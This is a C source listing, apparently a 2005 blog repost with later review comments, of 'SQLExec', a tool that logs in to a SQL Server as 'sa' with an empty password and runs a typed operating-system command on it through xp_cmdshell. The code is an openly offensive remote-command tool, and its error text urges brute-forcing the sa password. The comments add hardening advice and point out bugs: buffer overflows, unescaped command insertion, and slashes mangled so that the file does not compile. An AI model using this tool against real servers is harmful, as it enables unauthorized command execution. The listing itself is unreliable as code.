SQLExec.c

原创 2005年04月27日 16:45:00

#include <stdio.h>
#include <windows.h>
#include <wchar.h>
#include <sql.h>
#include <sqlext.h>
#include <lmcons.h>


/*
 * SQLExec: ODBC client that logs in to the SQL Server named in argv[1] as
 * "sa" with an empty password, reads one command line from stdin, submits it
 * through master..xp_cmdshell and prints column 1 of every result row.
 *
 * Usage: SQLExec <Hostname> (exactly one argument, otherwise only the banner
 * and usage text are printed). Every path returns 0, so the exit status does
 * not say whether anything succeeded.
 *
 * Defensive reading: the program depends on a server whose "sa" login still
 * has a blank password and where xp_cmdshell is available to that login.
 * A strong sa password (or a disabled sa login / SQL authentication),
 * xp_cmdshell left disabled, TCP 1433 (the port named in the error text
 * below) filtered from untrusted networks, and alerting on sa logins and
 * xp_cmdshell executions each remove or expose that dependency.
 *
 * NOTE(review): the listing shows "/n", '/0' and /" where C needs "\n",
 * '\0' and \" -- presumably the backslashes were mangled when the page was
 * published. As shown the xp_cmdshell format string is not a valid literal
 * and the file does not compile; the code is left exactly as listed.
 */
int main(int argc, char *argv[])
{
 SQLCHAR Host[512]="";
 /* Hard-coded credentials: login "sa", empty password, no database. */
 SQLCHAR *User=";UID=sa";
 SQLCHAR *Pass=";PWD=";
 SQLCHAR *Database="";
 SQLCHAR InConnectionString[1025]="";
 SQLCHAR rowBuff[200]="";
 SQLINTEGER   iRowBuff;
 UCHAR Query[1500]="";
 UCHAR Cmd[300]="";
 char inBuff[1025]=""; 
 SQLRETURN nResult;
 SWORD     sLen;
 SQLHDBC   hDbc;        
 HSTMT  hStmt;
 SQLHANDLE hEnvironment;
 int retries = 0;
 if(argc !=2)
 {
  printf("/n/n-------------SQLExec 1.0 for Windows NT/2K/9X-------------/n/nBy Egemen Tas (Send all feedbacks and bug reports to Junan007@163.com)/n/n");
  printf("/nUsage : SQLExec <Hostname> /n!!!!(Do not use ip addresses of targets)!!!!/n");
  return 0;
 }
 printf("/n/n-------------SQLExec 1.0 for Windows NT/2K/9X----------------/n/nBy Egemen Tas (Send all feedbacks and bug reports to Junan007@163.com)/n/n");
 /* Clears 1499 of the 1500 bytes; the ="" initializer already zeroed all of them. */
 memset(Query,0,1499);
 /* Unbounded copy: an argv[1] longer than 511 bytes overflows Host on the stack. */
 strcpy(Host,argv[1]);
 /* Unbounded sprintf; the result fits in 1025 bytes only while Host holds at
    most 511. Host is pasted in verbatim, so any ';' in the argument becomes
    part of the connection string. */
 sprintf(InConnectionString,"DRIVER={SQL Server};SERVER=%s%s%s%s",Host,User,Pass,Database);
 
 if (SQLAllocHandle(SQL_HANDLE_ENV,SQL_NULL_HANDLE,&hEnvironment) != SQL_SUCCESS)
 {
   printf("SQLAllocHandle returned an error!/n");
   return 0;
 }

 /* Request ODBC 3.x behaviour. This and the following early returns leave
    hEnvironment allocated. */
 if (SQLSetEnvAttr(hEnvironment, SQL_ATTR_ODBC_VERSION,(SQLPOINTER)
      SQL_OV_ODBC3, SQL_IS_INTEGER) != SQL_SUCCESS)
 {
   printf("SQLSetEnvAttr returned an error!/n");
   return 0;

 }

 /* Only SQL_SUCCESS is accepted here; SQL_SUCCESS_WITH_INFO is reported as an error. */
 if ((nResult = SQLAllocHandle(SQL_HANDLE_DBC,hEnvironment,(SQLHDBC FAR*)&hDbc)) != SQL_SUCCESS)
  {
   printf("SQLAllocHandle returned an error!/n");
   return 0;
  }

 /* Up to four connection attempts, with a 5 second pause after each of the
    first three failures; the fourth failure prints the help text and exits. */
 while(retries < 4)
 {
 nResult = SQLDriverConnect(hDbc,NULL, InConnectionString,
         strlen(InConnectionString),
         inBuff,  1024, &sLen,
         SQL_DRIVER_COMPLETE_REQUIRED);     
 if(nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO)
 {
   printf("Ok.You have connected to MASTER database.../n");
   /* Return value ignored; hStmt is used below whether or not this succeeded. */
   SQLAllocStmt(hDbc,&hStmt);
   break;
 }
 else
 {
  if(retries == 3)
  {
   printf("/nCould not connect to the SQL Server on the target!/n/nMake sure you use !!HOSTNAME NOT IP!!/n"
   "If you are using dial-up connection retry for a few times./n"
   "If you are sure that SQL server is installed on the target check that port 1433 is open./n"
   "If port 1433 is open and you have tried several times to connect, then probably SA does not have a NULL password./n"
   "Get a SQL server brute force cracker , try to hack passwords and try again./n"
   "If you are a script kiddy then go (www.technotronic.com or packetstorm.securify.com) , find some documents , read them at least 1 year and try again.:))");
  
  return 0;
  }
  retries++;
  printf("Performing retry(%d).../n",retries);
  Sleep(5000);
 }
 }
 printf("Now type dos command(s) to execute :");
 /* Reads at most 298 characters; the return value is not checked. */
 fgets(Cmd,299,stdin);
 /* Meant to strip the newline fgets keeps. If fgets read nothing, Cmd is still
    "" and strlen(Cmd)-1 wraps around, writing out of bounds; a line without a
    trailing newline loses its last character instead. */
 Cmd[strlen(Cmd)-1]='/0';
 /* The typed text is placed inside the quoted T-SQL argument with no escaping;
    Query (1500 bytes) is large enough for the prefix plus a 299-byte Cmd. */
 sprintf(Query,"EXEC master..xp_cmdshell /"%s/"",Cmd);
 printf("Trying to execute %s on the target/n",Cmd);
 /* Anything other than SQL_SUCCESS, including SQL_SUCCESS_WITH_INFO, takes the error path. */
 if(SQLExecDirect(hStmt,Query,SQL_NTS) != SQL_SUCCESS)
 {
  printf("An error occured while performing your query."
   "This does not mean that your command is unsuccesfull.../n"
   "Check the result.If it didnt work then /n"
   "make sure you did not use duplicate keywords with ODBC api/n or the target does not have ' xp_cmdshell ' stored procedure.");
  return 0;
 }
 /* On entry nResult still holds the successful SQLDriverConnect result, so the
    loop always starts; afterwards it tracks SQLFetch. */
 while (nResult != SQL_ERROR)
 {
      /* Clears only the first 99 of rowBuff's 200 bytes. */
      memset(rowBuff,0,99);
   nResult = SQLFetch(hStmt);
      /* SQL_SUCCESS_WITH_INFO prints this message and still prints the row below. */
      if (nResult == SQL_ERROR || nResult == SQL_SUCCESS_WITH_INFO)
   {
         printf("Error while fething the results from the stored proc./n");
      }
      if (nResult == SQL_SUCCESS || nResult == SQL_SUCCESS_WITH_INFO){


         /* Column 1 as text, limited to 100 bytes although rowBuff holds 200;
            the return value and the length indicator iRowBuff are not checked. */
         SQLGetData(hStmt, 1, SQL_C_CHAR, rowBuff, 100, &iRowBuff);
         printf("%s /n",rowBuff);
      } else
   {
         /* Any other result, such as SQL_NO_DATA at the end of the rows, ends the loop. */
         break;
      }
 }
 /* NOTE(review): SQLFreeHandle takes the handle itself, but the address of each
    handle variable is passed here. The statement is also released after the
    connection and environment it belongs to, and SQLDisconnect is never
    called, so these calls are unlikely to release anything -- confirm against
    the ODBC headers before reusing this cleanup. */
 SQLFreeHandle(SQL_HANDLE_DBC,&hDbc);
 SQLFreeHandle(SQL_HANDLE_ENV,&hEnvironment);
 SQLFreeHandle(SQL_HANDLE_STMT,&hStmt);

return 0;
}
